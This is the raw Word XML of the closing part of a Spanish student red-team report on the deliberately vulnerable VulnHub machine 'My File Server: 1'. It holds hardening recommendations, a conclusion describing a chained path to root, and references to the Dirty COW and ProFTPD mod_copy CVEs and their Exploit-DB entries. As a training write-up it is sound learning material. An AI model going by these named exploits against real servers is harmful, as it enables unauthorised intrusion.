        <w:t xml:space="preserve">Mínimo privilegio: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cada servicio con su cuenta y permisos estrictos.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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Reducir huella: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ocultar banners de versión y exponer solo lo indispensable.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rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoreo: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centralizar y proteger los registros; alertar sobre accesos de root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3B2E5A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3B2E5A" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="14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El ejercicio demostró que el compromiso total rara vez proviene de una única falla espectacular, sino del </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">encadenamiento de descuidos aparentemente menores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: un directorio de registros compartido de más, una contraseña reutilizada, un servicio obsoleto y un kernel sin actualizar. De forma individual parecerían de bajo riesgo; combinados, condujeron de un simple acceso de red hasta el control administrativo del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:before="0" w:line="28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La lección para una organización es clara: la seguridad de un servidor de archivos depende tanto de la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">higiene de configuración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 como de la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">gestión de parches y credenciales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. Desde la perspectiva de aprendizaje, la práctica reforzó una idea central del enfoque Red Team: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="222A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">pensar en cadenas de ataque, no en vulnerabilidades aisladas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A35"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">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"/>
        <w:gridCol w:w="9200"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="160"/>
            <w:shd w:fill="1EA7A0" w:val="clear"/>
          </w:tcPr>
          <w:p/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9200"/>
            <w:shd w:fill="E6F6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line="26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203A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Resultado del engagement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A35"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromiso total (root) alcanzado y documentado en 28 pasos. Entorno restaurado. Siete hallazgos reportados con sus recomendaciones.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="45506B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="45506B" w:sz="18"/>
        </w:pBdr>
        <w:spacing w:after="150" w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="14203A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Referencias</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:line="264"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1EA7A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415A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The Penetration Testing Execution Standard (PTES). http://www.pentest-standard.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:line="264"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1EA7A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415A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Foundation. OWASP Testing Guide v4. https://owasp.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:line="264"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1EA7A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415A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE. ATT&amp;CK Framework. https://attack.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:line="264"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1EA7A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415A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST / MITRE. CVE-2016-5195 “Dirty COW”. https://cve.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:line="264"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1EA7A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415A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST / MITRE. CVE-2015-3306 ProFTPD mod_copy. https://cve.mitre.org/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:line="264"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1EA7A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415A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Database. Dirty COW — Exploits 40839 y 40616. https://www.exploit-db.com/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="90" w:line="264"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1EA7A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415A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Armour Infosec / A. S. Verma. “My File Server: 1”, VulnHub. https://www.vulnhub.com/</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>
      <w:pgSz w:w="12240" w:h="15840" w:orient="portrait"/>
      <w:pgMar w:top="1150" w:right="1150" w:bottom="115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AE6" w:sz="4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B6472"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">Juan Francisco Ortega Jiménez · 184918</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6472"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">	Fundamentos de Ciberseguridad</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6472"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">	</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6472"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">Pág.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DAE6" w:sz="4"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B6472"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">Red Team · My File Server: 1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="E4477A"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve">	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A3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e7146a8fc9f13ab886c856515ad219ac70e9637.jpg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/9b0b2006e05b384dfe927f1ae466ccc52e2cb7c0.jpg"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ccb62b82afa2fa3b04ac341f29686f5965c3e6a2.jpg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/74b6d919ae9ef5b6ccdc430a4aa2a16a04c956f9.jpg"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/be51d4401647ef0a554ad8578616cf1427f4489c.jpg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/d34ecdf908cdd71f7b7c0ad74a36f2d2eba0e398.jpg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6eed2ccb929c15ff59c3574b30c319f820b9b7dd.jpg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/4ed0eb48a762c85a8b59ccf6fa9a59daf5f076fd.jpg"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/1ee3516beff6b3501f37d7b7d4d80e23e3703579.jpg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5ad69b8d61fabcab40cc1a5640c3438618b9e7f2.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/ca3f99c8f3931f2204ced5d5bb419ec404c22b81.jpg"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c789ad93a166b20665f57cd2ca3f37b2479a4465.jpg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/c620860c863ec1af948ddf3efa5bd482ff2660ce.jpg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/81c7471ddf2c806ce3b907bf12f880ac1a69e580.jpg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/414ff4745c4590de3a25fe5f38c74cc1e136abed.jpg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/0eec4bd6e458f972f747136cdc3ba01a20b628ee.jpg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/41f4bfd9b131f0a84d58b54a6e66b4348d21da3b.jpg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/5286da14953f88a37e5ade121a0e9119d562657f.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/139e85b9d416c5520aa0afb53f1fba7aafbea03a.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/61cfa779fc7ef9bba61c9b42a457f34862850a2c.jpg"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/55d5af5b6dc9f30e9b3f09e2522f6e4d72c0e86d.jpg"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/cb633c6ac5e7fe3b4e2da049f115b31e41cf3aba.jpg"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/6f1018b9c3cca90dba2104d42a85f2766536e2db.jpg"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/7cd4aa840ca9fdadaecccb28b4aca5c819eb1d8b.jpg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/eaeb1e8e3199b5567a77b68d006dc0af704b49c2.jpg"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/36fd3f90bd7cd2d6a6575ffad17ff73b2fdf8ac0.jpg"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/bf973651e7d0cc2512f02f5bf846a69012d3aa9c.jpg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/54deb62202a5f6d7c4b06e6528b35d08e35b888e.jpg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Red Team — My File Server 1 (paso a paso)</dc:title>
  <dc:creator>Juan Francisco Ortega Jiménez</dc:creator>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-01T14:04:19.140Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-01T14:04:19.140Z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